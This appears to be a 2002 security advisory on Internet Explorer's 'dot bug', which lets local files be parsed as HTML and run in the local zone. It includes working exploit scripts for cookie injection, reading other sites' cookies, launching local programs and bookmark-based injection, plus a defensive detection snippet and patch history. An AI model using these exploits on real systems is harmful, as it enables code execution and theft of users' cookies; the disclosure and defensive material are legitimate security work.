
Internet Explorer dot bug
21st May 2002 [SBWID-5354]
COMMAND

	IE dot bug

SYSTEMS AFFECTED

	IE all releases ??

PROBLEM

	

	Andreas Sandblad [sandblad@acc.umu.se] posted :

	

	

	In order for IE to parse a local file as an HTML document, the filename
	extension must be associated with HTML documents (normally .htm and
	.html). HTML code must also be found somewhere near the beginning of the
	file (IE only scans a certain number of bytes of the file). This is good
	security, because several kinds of user data are stored in local files
	(cookies, favorites/bookmarks, application user data etc.). The problem
	is that IE can be tricked into thinking that a local file is an HTML
	document regardless of its file extension.
	

	The trick is simply to add a dot "." when linking to a local filename.
	If we link to a file with the .txt extension, then as of patch MS02-023
	we must add " ." (space + dot) instead. To test this behaviour, create a
	file called c:/test.txt with some HTML code in it. Now compare the
	difference in parse behaviour by typing the following in the address
	field:

	about:<a href="file:///c:/test.txt .">test.txt .</a>

	and compare it with:

	about:<a href="file:///c:/test.txt">test.txt</a>

	

	The exploit method is the following:

	 1. Find a file storing data that is partly under our control (generated
	    by IE or by any other third-party software).

	 2. Make sure the data is inserted within the first x bytes of the file.

	 3. Inject HTML+script code into the file and link to it together with a
	    dot (or space + dot for .txt files). The script will then operate in
	    the local computer zone.
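Two defender-side checks that follow from the method above, added here as an example and not part of the original advisory: one flags file: URLs that carry the trailing "." or " ." suffix on a non-HTML extension (for proxy or browser-history review), the other finds data files such as cookie files whose leading bytes would be taken for HTML. The 256-byte window, the marker list and the sample cookie files are assumptions, since the advisory does not say how many bytes IE scans.

```python
import re
from urllib.parse import unquote, urlsplit

HTML_EXTENSIONS = {"htm", "html"}  # extensions IE treats as HTML, per the advisory

# Real extension followed by the dot-bug suffix: "." or " ." (space + dot).
_DOT_SUFFIX = re.compile(r"^(?P<path>.*?\.(?P<ext>[A-Za-z0-9]+))(?P<suffix>\s*\.+)$")

# Assumed sniffing window and markers; the advisory only says IE scans
# "a certain amount of bytes" at the start of the file.
SNIFF_LIMIT = 256
_HTML_MARKERS = (b"<html", b"<!doctype", b"<script", b"<object", b"<iframe", b"<body")

def check_file_url(url):
    """Classify a file: URL (None for other schemes): real path, extension,
    and whether the dot-bug suffix hides a non-HTML extension."""
    parts = urlsplit(url)
    if parts.scheme.lower() != "file":
        return None
    path = unquote(parts.path)
    m = _DOT_SUFFIX.match(path)
    if not m:
        return {"path": path, "ext": None, "suspicious": False}
    ext = m.group("ext").lower()
    return {"path": m.group("path"), "ext": ext,
            "suspicious": ext not in HTML_EXTENSIONS}

def html_in_prefix(data, limit=SNIFF_LIMIT):
    """True if an HTML/script marker occurs within the first `limit` bytes
    (step 2 of the advisory's method: injected data near the file start)."""
    head = data[:limit].lower()
    return any(marker in head for marker in _HTML_MARKERS)

def find_sniffable_files(files, limit=SNIFF_LIMIT):
    """Given {filename: bytes}, list the non-HTML data files whose leading
    bytes would be parsed as HTML if opened with the dot-bug suffix."""
    hits = []
    for name, data in files.items():
        ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
        if ext not in HTML_EXTENSIONS and html_in_prefix(data, limit):
            hits.append(name)
    return sorted(hits)

# Constructed sample cookie files (not real data): one clean, one carrying
# injected markup in its value, plus an ordinary .htm page for contrast.
SAMPLE_FILES = {
    "anyuser@example[1].txt": b"session\r\nabc123\r\nexample.com/\r\n",
    "anyuser@unique[1].txt": b"evil\r\n<html><script>x()</script></html>\r\nunique/\r\n",
    "index.htm": b"<html><body>hello</body></html>",
}
```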

	

	

	

	 EXPLOITS:
	 ========

	----------------------------------------------------------------
	NOTE: Please note that you MUST change some variables
	      in order for the exploits to work. The following exploits
	      have only been tested on IE 6.0. Because the exploits
	      require knowledge of the exact path to files, they may fail
	      on non-default systems.
	----------------------------------------------------------------

	

	

	 --=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-
	 METHOD:  Cookie based script execution
	 IMPACT:  Scripting in local computer zone - running local
	          programs, running signed programs from a webpage,
	          reading local files.
	 PATCH:   MS02-015 released 28 March 2002 will stop this exploit.
	 NOTE:    - This exploit is designed for Win 98/ME. In order
	          to work on Win 2000/XP the username must be known.
	          Please change cookieFile and scriptFile.
	          - Code must be in a directory called "unique" to
	          get the correct name of the cookie file.
	 --=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-

	

	- - - - - - - - - - CUT HERE - - - - - - - - - - - - - - - - - -
	<script>
	// Path/URL variables referred to in the NOTE above, left commented
	// out as in the advisory:
	//cookieFile = "c:/DOCUME~1/ADMINI~1/cookies/administrator@unique[1].txt";
	//cookieFile = "c:/windows/cookies/anyuser@unique[1].txt";
	//scriptFile = "http://www.microsoft.com/unique/payload.js";

	// Step 1: set a cookie whose value is an HTML document referencing
	// scriptFile; IE writes it to the cookie file named above.
	function injectCookie(){
	  code = "<html><script src='"+scriptFile+"'><"+"/script><"+"/html>";
	  document.cookie = "evil="+code+"; expires=Fri, 13 Dec 2003 23:59:59 GMT;";
	  alert("*** Cookie injected! ***");
	}
	// Step 2: open the cookie file with a trailing dot so IE parses it as HTML.
	function loadCookie(){
	  alert("*** Loading cookie! ***");
	  document.location="file:///"+cookieFile+"."; // the important dot!
	}
	</script>

	<a href="javascript:injectCookie()">injectCookie() step 1.</a><br>
	<a href="javascript:loadCookie()">loadCookie() step 2.</a>
	- - - - - - - - - - CUT HERE - - - - - - - - - - - - - - - - - -

	

	payload.js:

	- - - - - - - - - - CUT HERE - - - - - - - - - - - - - - - - - -
	// Candidate locations of winmine.exe, used by the advisory as a
	// harmless demonstration of launching a local program.
	files = new Array(
	  "c:/windows/system32/winmine.exe",
	  "c:/windows/winmine.exe",
	  "c:/winnt/system32/winmine.exe"
	);
	function init(){
	  for (i=0;files[i];i++)
	  {
	    // <object> with a local codebase; the CLSID is a dummy value.
	    s = '<object classid=CLSID:12345678-1234-1234-1234-123456789012 ';
	    s+= 'codebase="file:///'+files[i]+'" style=display:none></object>';
	    document.write("<html>"+s+"<"+"/html>");
	  }
	}
	window.onload=init;
	- - - - - - - - - - CUT HERE - - - - - - - - - - - - - - - - - -

	

	

	 --=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-
	 METHOD:  Cookie based cookie reading
	 IMPACT:  Reading content of arbitrary cookie.
	 PATCH:   MS02-023 released 15 May 2002 will stop this exploit.
	 NOTE:    - Use the same exploit as for
	          "Cookie based script execution", but replace
	          payload.js with the code below.
	          - cookieRead is set to read your Google cookie.
	          The cookie must of course exist. cookieRead must be
	          altered.
	 ----------------------------------------------------------------

	

	payload.js:

	- - - - - - - - - - CUT HERE - - - - - - - - - - - - - - - - - -
	//cookieRead = "administrator@google[1].txt";
	//cookieRead = "anyuser@google[1].txt";
	// The relative name resolves against the cookie directory the page
	// was loaded from, so the hidden iframe shows another cookie file.
	s = '<iframe name=i src='+cookieRead+' style=display:none onload=';
	s+= 'alert(i.document.body.innerText)></iframe>';
	document.write(s);
	- - - - - - - - - - CUT HERE - - - - - - - - - - - - - - - - - -

	

	

	 --=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-
	 METHOD:  Favorite/bookmark based script execution
	 IMPACT:  Scripting in local computer zone.
	 PATCH:   NONE
	 NOTE:    - This exploit is designed for Win 98/ME. In order
	          to work on Win 2000/XP the username must be known.
	          Please change bookmarkFile and scriptFile.
	          - Use the same payload.js as in the exploit
	          "Cookie based script execution".
	 ----------------------------------------------------------------

	

	- - - - - - - - - - CUT HERE - - - - - - - - - - - - - - - - - -
	<script>
	//bookmarkFile = "c:/DOCUME~1/ADMINI~1/favorites/unique.url";
	//bookmarkFile = "c:/windows/favorites/unique.url";
	//scriptFile = "http://www.microsoft.com/unique/payload.js";

	// Step 1: AddFavorite writes the "URL" into unique.url; the URL here
	// is an HTML document that points its own <script> at scriptFile.
	function injectBookmark(){
	  code = '<html><script>document.scripts[0].src="';
	  code += scriptFile+'"<'+'/script><'+'/html>';
	  window.external.AddFavorite('http://'+code,'unique');
	}
	// Step 2: open the .url file with a trailing dot so IE parses it as HTML.
	function loadBookmark(){
	  alert("*** Loading bookmark file! ***");
	  document.location="file:///"+bookmarkFile+"."; // the important dot!
	}
	</script>

	<a href="javascript:injectBookmark()">injectBookmark() step 1.</a><br>
	<a href="javascript:loadBookmark()">loadBookmark() step 2.</a>
	- - - - - - - - - - CUT HERE - - - - - - - - - - - - - - - - - -

	

	

	 --=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-
	 METHOD:  Third-party software based script execution
	 IMPACT:  Scripting in local computer zone. For some software,
	          execution of arbitrary remote programs.
	 PATCH:   NONE
	 NOTE:    Only a few third-party programs investigated.
	 ----------------------------------------------------------------

	

	Winamp: Winamp stores the current playlist in "c:/program
	files/winamp/winamp.m3u". The playlist will contain artist name and
	song title. If we inject HTML/script code into the artist/title of an
	mp3 file (ID3v2 tag) that is loaded remotely, the new playlist file will
	be saved together with the HTML code. Using the dot bug trick the local
	playlist file can be loaded and will operate in the local zone. Since
	the playlist file will contain the exact path to the "Temporary Internet
	Files" folder, we can run arbitrary code using the old ".chm helpfile
	attack" or the codebase of an object tag.
	

	Java(TM) 2 SDK, Standard Edition, v 1.4.0: Class files and graphics for
	applets are stored in %userprofile%\.jpi_cache\file\1.0\. Exploit
	method: insert HTML/script code in a gif picture used by a Java applet
	loaded from a remote webpage. The local filename of the picture will be
	something like (random characters):

	exploita.gif-41615d6-26f536aa.gif

	This is equal to EXPLOI~1.GIF (old filesystem support). Use the dot bug
	trick to load the file as an HTML document. The script will operate in
	the local computer zone.
	

	

	 Bug History
	 ===========

	[2002-02-17]
	Initially reported the dot bug vulnerability to Microsoft.

	[2002-03-28]
	Microsoft released patch: "Cookie-based Script Execution" (MS02-015)

	Solution: Files in the cookie directory are not treated as being in
	the local computer zone.

	Problem: Does not fix the real issue. It is still possible to use the
	cookie based attack to read other cookies.

	[2002-03-30]
	A non-disclosure advisory sent to Bugtraq: "IE: Remote webpage can
	script in local zone" http://online.securityfocus.com/archive/1/265459

	[2002-05-15]
	Microsoft released patch: "Script within Cookies Reading Cookies"
	(MS02-023)

	Solution: Put files in the cookie directory in the restrictive zone
	(disables the exploit to read other cookies). Attempt to prevent local
	files with the .txt extension from being parsed as HTML documents using
	the dot bug.

	Problem: Real issue still not fixed. By appending " ." instead of
	"." files with the .txt extension can still be treated as HTML documents.

SOLUTION

	Workaround: Disable active scripting.

	Wait for yet another IE patch.
